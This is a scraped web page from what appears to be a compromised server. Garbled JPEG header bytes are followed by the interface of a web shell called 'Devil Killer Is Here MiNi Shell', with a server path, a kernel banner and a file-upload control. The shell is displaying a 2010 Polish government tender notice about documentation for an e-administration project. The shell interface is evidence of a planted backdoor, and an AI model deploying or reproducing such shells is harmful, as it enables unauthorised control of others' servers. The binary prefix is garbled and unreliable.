JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100719/191925-N-2010.html

<p class="kh_header"><b>Białystok: Sporządzenie dokumentacji dot. przygotowania i przeprowadzenia postępowania w ramach projektu CU2</b><br>
<b>Numer ogłoszenia: 191925 - 2010; data zamieszczenia: 19.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Podlaski Urząd Wojewódzki w Białymstoku , ul. Adama Mickiewicza 3, 15-213 Białystok, woj. podlaskie, tel. 085 74-39-362, faks 085 7439320, 7439254.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialystok.uw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie dokumentacji dot. przygotowania i przeprowadzenia postępowania w ramach projektu CU2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest sporządzenie dokumentacji w zakresie przygotowania i przeprowadzenia jednego postępowania o udzielenie zamówienia publicznego w trybie przewidzianym ustawą Prawo zamówień publicznych o wartości większej niż kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8 ustawy. Postępowanie to będzie prowadzone przez Wojewodę Podlaskiego w ramach projektu Wdrażanie elektronicznych usług dla ludności województwa podlaskiego - część II, administracja rządowa. 
2.	Sporządzenie dokumentacji dotyczy postępowania o udzielenie zamówienia publicznego na wyłonienie wykonawcy (zwanego dalej wykonawcą systemów) budowy, dostawy, instalacji i wdrożenia systemów informatycznych w obszarze e-Administracja oraz e-Bezpieczeństwo w części pilotażowej i docelowej, przy założeniu, że oba systemy wykorzystują wspólną platformę sprzętową. Zamawiający przewiduje podział zamówienia na części (Zadanie 1 i Zadanie 2) i dopuszczenie możliwości składania ofert częściowych: 
1)	Zadanie 1. W systemie e-Administracja (w zakresie EZD oraz CU AR) - wykonawca systemów będzie zobowiązany do wykonania następujących zadań:
a)	etap I- pilotaż: 
-	przygotowanie architektury projektu platformy Centralny Urząd Administracji Rządowej (CU AR) oraz systemu Elektronicznego Zarządzania Dokumentami (EZD) jednolitego dla wszystkich jednostek uczestniczących w projekcie w oparciu o założenie i wskaźniki opracowane w ramach Studium Wykonalności. Po odbiorze architektury, przejście do kolejnych kroków postępowania. Architektura musi brać pod uwagę wszystkie elementy opisane w SW projektu, w szczególności system ERP i inne elementy systemu Podlaskiego Urzędu Wojewódzkiego w Białymstoku (PUW), 
-	przygotowanie opisu sprzętu, parametrów łącz telekomunikacyjnych i sposobów komunikacji, niezbędnych do realizacji pilotażu  - sprzęt do jednostek pilotażowych, w szczególności do obsługi systemu EZD (stanowiska i serwerownie), 
-	przygotowanie prototypu platformy i systemu EZD zgodnie z opracowaną architekturą w tiret 1. Prototyp platformy zostanie uruchomiony i będzie utrzymywany do czasu uruchomienia wersji produkcyjnej na sprzęcie wykonawcy systemów w serwerowni Zamawiającego, 
-	pilotaż prototypu (w zakresie platformy i systemu EZD) w od 5 do 7 JAR. Zakończenie pilotażu i przystąpienie do produkcyjnej części po zweryfikowaniu wszystkich funkcji prototypu przez Zamawiającego, 
-	przygotowanie opisu sprzętu niezbędnego do realizacji platformy CU AR (sprzęt do Wojewódzkiego Centrum Przetwarzania Administracji Rządowej - WCPAR) oraz parametrów serwerowni WCPAR. Przygotowanie zakresu adaptacji poszczególnych serwerowni u partnerów - opis niezbędny do uruchomienia kolejnych postępowań w ramach realizacji projektu, 
-	budowa aplikacji Cyfrowego Urzędu Administracji Rządowej (CU AR), 
-	wdrożenie systemu elektronicznego zarządzania dokumentacją (obiegu dokumentów) w jednostkach pilotażowych, 
-	implementacja wzorcowych usług prostych w jednostkach biorących udział we wdrożeniu pilotażowym, 
-	przygotowanie opisu sprzętu, parametrów łącz telekomunikacyjnych i sposobów komunikacji, niezbędnych do realizacji docelowego wdrożenia EZD (stanowiska i serwerownie dla pozostałych jednostek uczestniczących w projekcie) oraz CU AR (sprzęt do WCPAR) - opis sprzętu niezbędny do uruchomienia kolejnego postępowania w ramach realizacji projektu, 
-	modyfikacje aplikacji EZD i CU AR oraz pozostałych elementów projektu - implementacja zmian wynikających z analizy etapu eksploatacji pilotażowej,
b)	etap II- wdrożenie docelowe:
-	wdrożenie docelowego systemu CU AR - po dostarczeniu sprzętu przez Zamawiającego określonego w etapie I, 
-	wdrożenie docelowego EZD we wszystkich jednostkach - po dostarczeniu sprzętu przez Zamawiającego określonego w etapie I, 
-	implementacja wzorcowych usług prostych dla wszystkich jednostek (z wyjątkiem jednostek biorących udział w pilotażu), 
-	implementacja wzorcowych usług zintegrowanych, 
-	realizacja dodatkowych prac integracyjnych w środowisku informatycznym Podlaskiego Urzędu Wojewódzkiego - budowa systemu ERP, 
-	adaptacja pomieszczeń serwerowni WCPAR do potrzeb projektu, 
-	adaptacja pomieszczeń serwerowni na potrzeby sprzętu serwerowego przeznaczonego do obsługi systemów EZD w poszczególnych JAR, 
-	dostawa, instalacja i konfiguracja sprzętu serwerowego na potrzeby systemów EZD w JAR biorących udział w pilotażu, 
-	dostawa, instalacja i konfiguracja sprzętu stanowiskowego oraz wyposażenia kancelarii i sekretariatów na potrzeby systemów EZD w JAR biorących udział w pilotażu, 
-	dostawa, instalacja i konfiguracja sprzętu serwerowego na potrzeby WC PAR i CU AR, 
-	dostawa, instalacja i konfiguracja sprzętu serwerowego na potrzeby systemów EZD w JAR nie biorących udział w pilotażu (pozostałe jednostki), 
-	dostawa, instalacja i konfiguracja sprzętu stanowiskowego oraz wyposażenia kancelarii i sekretariatów na potrzeby systemów EZD w JAR nie biorących udział w pilotażu (pozostałe jednostki); 
2)	Zadanie 2. W systemie e-Bezpieczeństwo wykonawca systemów będzie zobowiązany do wykonania następujących zadań:
a)	etap I- pilotaż:
-	projekt systemu e-Bezpieczeństwo, 
-	przygotowanie opisu sprzętu, parametrów łącz telekomunikacyjnych i sposobów komunikacji, niezbędnych do realizacji systemu e-Bezpieczeństwo, 
-	wykonanie aplikacji składowych systemu e-Bezpieczeństwo, 
b)	etap II- wdrożenie docelowe:
-	instalacja i konfiguracja systemu e-Bezpieczeństwo, 
-	opracowanie procedur zasilania danymi baz systemu, 
-	wdrożenie systemu e-Bezpieczeństwo.
3.	Szacunkowa wartość postępowania, w ramach którego przygotowywana będzie dokumentacja, to kwota równa lub przekraczająca kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8 ustawy Prawo zamówień publicznych. Koszt powyżej opisanego postępowania sfinansowany zostanie przez Unię Europejską w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego na lata 2007-2013. Ogólne informacje nt. projektu Wdrażanie elektronicznych usług dla ludności województwa podlaskiego - część II, administracja rządowa znajdują się na stronie http://cu2.bialystok.uw.gov.pl/Default.aspx.
4.	Zakres zadań Wykonawcy dokumentacji w zakresie przygotowania i przeprowadzenia postępowania o udzielnie zamówienia publicznego, realizowany będzie w dwóch etapach, w ramach których Wykonawca będzie zobowiązany do:
1)	etap I - przygotowanie postępowania:
a)	szacowanie aktualnej wartości zamówienia,
b)	weryfikacja pod względem zgodności z prawem opisu przedmiotu zamówienia przygotowanego przez Zamawiającego,
c)	przygotowanie opinii prawnej w zakresie wyboru trybu udzielenia zamówienia spośród przewidzianych ustawą Prawo zamówień publicznych. Ostatecznego wyboru trybu dokona Zamawiający; przygotowanie opinii prawnej w zakresie określenia warunków udziału w postępowaniu, kryteriów oceny ofert,
d)	opracowanie specyfikacji istotnych warunków zamówienia (SIWZ) wraz załącznikami, w tym projektu umowy (umów) w sprawie udzielenia zamówienia publicznego,
e)	przygotowanie treści ogłoszenia o zamówieniu; 
2)	etap II - przeprowadzenie postępowania:
a)	bieżące sporządzanie we współpracy z Zamawiającym niezbędnej dokumentacji z postępowania od momentu wszczęcia postępowania do chwili podpisania umowy, 
b)	opracowywanie we współpracy z Zamawiającym oraz sporządzanie dokumentacji w zakresie postępowań odwoławczych na każdym etapie postępowania o udzielenie zamówienia publicznego,
c)	przygotowywanie projektów pism i innych dokumentów Zamawiającego związanych z prowadzonym postępowaniem, propozycji odpowiedzi na pytania wykonawców, wyjaśnień i ewentualnych zmian SIWZ, z wyłączeniem zapytań dotyczących opisu przedmiotu zamówienia - z zastrzeżeniem postanowień kolejnego punktu, 
d)	przygotowanie we współpracy z Zamawiającym odpowiedzi na pytania Wykonawców, wyjaśnień i ewentualnych zmian SIWZ dotyczących opisu przedmiotu zamówienia, 
e)	udział w czynnościach związanych z badaniem i oceną złożonych ofert (z wyłączeniem kwestii technicznych dotyczących opisu przedmiotu zamówienia), występowaniem przyczyn do odrzucenia oferty, wyborem oferty najkorzystniejszej lub stwierdzeniem podstaw do unieważnienia postępowania,
f)	opracowanie Zamawiającemu analizy w zakresie propozycji wykluczenia wykonawcy, odrzucenia oferty oraz wyboru oferty najkorzystniejszej, a także w zakresie unieważnienia postępowania o udzielenie zamówienia, 
g)	opracowanie pism do wykonawców z informacją o wyborze najkorzystniejszej oferty, do wykonawców, których oferty zostały odrzucone oraz do wykonawców, którzy zostali wykluczeni z postępowania - podając uzasadnienie faktyczne i prawne,
h)	opracowywanie projektu kompletnego i zgodnego z przepisami prawa protokołu postępowania o udzielenie zamówienia,
i)	nadzorowanie etapu podpisania umowy z Wykonawcą, w tym badanie poprawności wniesionego zabezpieczenia należytego wykonania umowy,
j)	przygotowywanie opinii prawnych w zakresie zmian pojawiających się w trakcie realizacji zamówień udzielonych na podstawie dokumentacji sporządzonej przez Wykonawcę, w tym sporządzanie ewentualnych projektów aneksów do umów zawartych z wykonawcami, a także w zakresie wykonania zamówień uzupełniających i dodatkowych,
k)	przygotowywanie opinii w zakresie problemów pojawiających się w trakcie prowadzenia postępowania oraz realizacji zamówienia - na żądanie Zamawiającego.
5.	Wykonawca zobowiązany jest do dostarczenia dokumentów w powyższym zakresie do Zamawiającego w postaci elektronicznej lub papierowej, zgodnie z wcześniejszymi ustaleniami z Zamawiającym, zaś dalsze ich przekazanie, bądź publikacja należy do Zamawiającego. 
6.	Na wykonany przedmiot zamówienia Wykonawca udzieli: 
1)	gwarancji jakości na okres realizacji Projektu, tj. do czerwca 2013 r. oraz na okres trwałości Projektu, tj. przez pięć lat od jego zakończenia; 
2)	rękojmi za wady na okres 12 miesięcy od dnia podpisania bezusterkowego protokołu końcowego odbioru przedmiotu umowy. 
7.	Zamawiający nie dopuszcza możliwości składania ofert częściowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.13.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. 	Wykonawca zobowiązany jest do wniesienia wadium.
2.	Kwota wadium: 2 400,00 PLN (słownie: dwa tysiące czterysta złotych). 
3.	Termin złożenia wadium: przed upływem terminu składania ofert.
4.	Wadium może być wniesione w formach określonych w art. 45 ust. 6 ustawy. 
5.	W przypadku wniesienia wadium w pieniądzu należy dokonać tego przelewem na rachunek bankowy Wydziału Finansów i Budżetu Podlaskiego Urzędu Wojewódzkiego: Bank Zachodni WBK S.A. Nr 79109025870000000109028701, z dopiskiem: wadium w przetargu ograniczonym na sporządzenie dokumentacji w zakresie przygotowania i przeprowadzenia postępowania o udzielnie zamówienia w ramach projektu CU2.
6.	Wadium wnoszone w pieniądzu musi wpłynąć na rachunek bankowy Zamawiającego przed upływem terminu składania ofert.
7.	Wadium wnoszone w innej formie, niż w pieniądzu musi zostać złożone w sekretariacie Biura Organizacji i Kadr Podlaskiego Urzędu Wojewódzkiego w Białymstoku w zamkniętej kopercie opisanej tak, jak oferta, z dopiskiem WADIUM i być ważne przez cały okres związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykonał co najmniej 3 usługi polegające na opracowaniu dokumentacji w zakresie przygotowania i przeprowadzenia postępowań o udzielenie zamówienia publicznego o wartości równej bądź przekraczającej kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8 ustawy Prawo zamówień publicznych - w okresie ostatnich trzech lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponował co najmniej 2 osobami (z których co najmniej jedna posiada uprawnienia radcy prawnego), które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi następujące doświadczenie: każda z osób posiada doświadczenie w opracowywaniu, w ciągu ostatnich 3 lat, przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, dokumentacji w zakresie przygotowania i przeprowadzenia co najmniej 3 postępowań o wartości równej bądź przekraczającej kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 50 000,00 PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Znaczenie warunków: 
1)	warunek posiadania wiedzy i doświadczenia Zamawiający będzie oceniał w następujący sposób: za każdą wykonaną przez Wykonawcę usługę, spełniającą wymagania określone przez Zamawiającego, ponad wymagane minimum zostanie przyznany 1 punkt. Maksymalnie Wykonawca może uzyskać 5 punktów; 
2)	warunek dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia Zamawiający będzie oceniał w następujący sposób: za każdą osobę ponad wymagane minimum, którą Wykonawca dysponuje lub będzie dysponował posiadającą wymagane przez Zamawiającego doświadczenie zostanie przyznany 1 punkt. Maksymalnie Wykonawca może uzyskać 5 punktów.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bialystok.uw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Oddział ds. Zamówień Publicznych Biura Organizacji i Kadr Podlaskiego Urzędu Wojewódzkiego w Białymstoku, ul. Mickiewicza 3, pokój nr 50.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2010 godzina 10:00, miejsce: Sekretariat Biura Organizacji i Kadr Podlaskiego Urzędu Wojewódzkiego w Białymstoku, ul. Mickiewicza 3, 15 - 213 Białystok, pokój nr 49.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




